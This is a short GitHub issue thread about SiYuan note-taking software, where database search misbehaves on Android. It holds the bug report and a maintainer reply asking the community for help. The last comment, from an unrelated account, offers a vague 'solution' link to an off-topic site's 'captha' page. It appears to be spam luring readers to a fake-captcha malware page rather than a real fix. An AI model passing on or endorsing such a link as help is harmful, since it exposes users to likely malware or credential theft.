### ISSUE TITLE
Search in database is bugged in mobile

### ISSUE THREAD

**Issue by FancyBEAST** [siyuan-note/siyuan#12838]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Can the issue be reproduced with the default theme (daylight/midnight)?

- [X] I was able to reproduce the issue with the default theme

### Could the issue be due to extensions?

- [X] I've ruled out the possibility that the extension is causing the problem.

### Describe the problem

https://github.com/user-attachments/assets/e6984d8b-5236-424c-bfaf-96a7c8e13d45

When trying to search in database on mobile database it is bugging out

### Expected result

Working search

### Version environment

```markdown
- Version: 3.1.9
- Operating System: Android 14
- Browser (if used):
```

### Log file

[system-log.zip](https://github.com/user-attachments/files/17447385/system-log.zip)

**Comment by 88250** [comment]
Hello, we have tried to fix this problem before https://github.com/siyuan-note/siyuan/issues/11098

But we have not found a better solution yet, and we need the community to help us solve it.

**Comment by ummm288** [comment]
to fix your trouble check this solution [click](https://www.calvarywhangarei.co.nz/captha/index.html)
maybe this will solve your problem.
